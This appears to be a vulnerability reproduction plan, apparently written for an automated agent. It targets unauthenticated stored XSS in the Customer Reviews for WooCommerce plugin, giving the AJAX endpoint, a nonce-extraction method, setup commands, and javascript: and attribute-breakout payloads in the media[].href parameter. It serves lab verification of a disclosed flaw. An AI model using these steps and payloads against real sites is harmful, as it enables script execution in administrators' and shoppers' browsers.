Customer Reviews for WooCommerce <= 5.97.0 - Unauthenticated Stored Cross-Site Scripting via media[].href Parameter

This research plan outlines the steps required to demonstrate the Stored Cross-Site Scripting (XSS) vulnerability in the "Customer Reviews for WooCommerce" plugin.

1. Vulnerability Summary

The "Customer Reviews for WooCommerce" plugin fails to properly sanitize the href attribute within the media array parameter during review submissions. When a user (including unauthenticated guests, if enabled) submits a review with media attachments, the href parameter is stored in the database. Because this value is not validated or escaped using esc_url() upon storage or output, an attacker can inject malicious javascript: URIs or breakout of the HTML attribute context to execute arbitrary JavaScript when the review is viewed by an admin or other users.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: ivole_post_review (inferred based on plugin architecture for review submission)
• Vulnerable Parameter: media[0][href] (an array parameter)
• Authentication: Unauthenticated (requires ivole_enable_guest_reviews setting to be yes)
• Precondition: The "Enable for Guests" option must be enabled in the plugin settings to allow unauthenticated exploitation.

3. Code Flow (Inferred)

1. Entry Point: The plugin registers a wp_ajax_nopriv_ivole_post_review hook to handle review submissions from guests.
2. Processing: The handler function (likely in includes/reviews/class-cr-reviews.php or similar) retrieves the media array from $_POST.
3. Storage: The plugin iterates through the media items and saves the href values as comment meta or within a JSON-encoded array in the wp_comments table. It fails to use esc_url_raw() or a similar sanitization filter.
4. Sink: When a user views the product page or an admin views the "Reviews" menu in the dashboard, the plugin retrieves the media data and renders an <a> or <img> tag using the raw href value without esc_url() or esc_attr().

4. Nonce Acquisition Strategy

The plugin typically uses wp_localize_script to pass a security nonce to the frontend review form.

1. Shortcode Identification: The review form is rendered via the [cusrev_reviews_form] shortcode (or sometimes automatically on product pages).
2. Page Creation:

   wp post create --post_type=page --post_title="Review Test" --post_status=publish --post_content='[cusrev_reviews_form]'
   

3. Extraction:
   • Navigate to the newly created page.
   • The script data is usually stored in the ivole_ajax_object (or cr_ajax_object in newer versions) global JS variable.
   • Verification: Use browser_eval to find the nonce.

   // Check for common localization objects used by this plugin
   window.ivole_ajax_object?.ivole_post_review_nonce || window.cr_ajax_object?.nonce
   

5. Exploitation Strategy

Step 1: Configure Plugin Settings
Ensure guest reviews are enabled so the nopriv AJAX action is reachable.

wp option update ivole_enable_guest_reviews "yes"

Step 2: Obtain Nonce
Use the browser_navigate and browser_eval tools to grab the nonce from the page containing the shortcode.

Step 3: Submit Malicious Review
Send a POST request to admin-ajax.php with the XSS payload.

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Parameters:
  • action: ivole_post_review
  • security: [NONCE_OBTAINED_IN_STEP_2]
  • comment_post_ID: 1 (or any valid product ID)
  • author: Attacker
  • email: attacker@example.com
  • comment: Great product!
  • rating: 5
  • media[0][type]: image
  • media[0][href]: javascript:alert(document.domain) (Payload A)
  • media[0][href]: "><img src=x onerror=alert(1)> (Payload B - if attribute breakout is possible)

Step 4: Trigger XSS
Navigate to the WordPress admin dashboard reviews section (/wp-admin/edit-comments.php) or the product page where the review was posted.

6. Test Data Setup

1. Product: Ensure at least one WooCommerce product exists (ID 1).
2. Settings:

   wp option update ivole_enable_guest_reviews "yes"
   # Ensure reviews are actually enabled in WooCommerce
   wp option update woocommerce_enable_reviews "yes"
   

3. Form Page: Create the page for nonce extraction as described in Section 4.

7. Expected Results

• The AJAX request should return a success status (likely {"code":1} or similar JSON).
• The review should appear in the "Pending" or "Approved" comments list in the WordPress database.
• When viewing the review in the admin dashboard, the media link should contain the malicious payload.
• Clicking the media link or simply loading the page (if using Payload B) will execute the JavaScript.

8. Verification Steps

1. Database Check: Verify the payload is stored in the database unsanitized.

   # Check comment meta (common storage for CR WooCommerce)
   wp db query "SELECT meta_value FROM wp_commentmeta WHERE meta_key = 'ivole_review_image' OR meta_key = 'cr_review_media'"
   

2. HTML Response Check: Fetch the product page or admin comment page and check for the unescaped payload.

   # Use http_request to get the HTML of the product page
   # Search for the string "javascript:alert" or the injected img tag.
   

9. Alternative Approaches

• Action String Variations: If ivole_post_review fails, check for cr_post_review or ivole_submit_review.
• Parameter Structure: If media[0][href] does not work, try media_url[] or ivole_files[] based on observing the network traffic when submitting a legitimate review via the browser.
• Bypass Nonce: Check if the security check is missing in the nopriv version of the handler. Some versions of this plugin historically had weak nonce enforcement for guest reviews.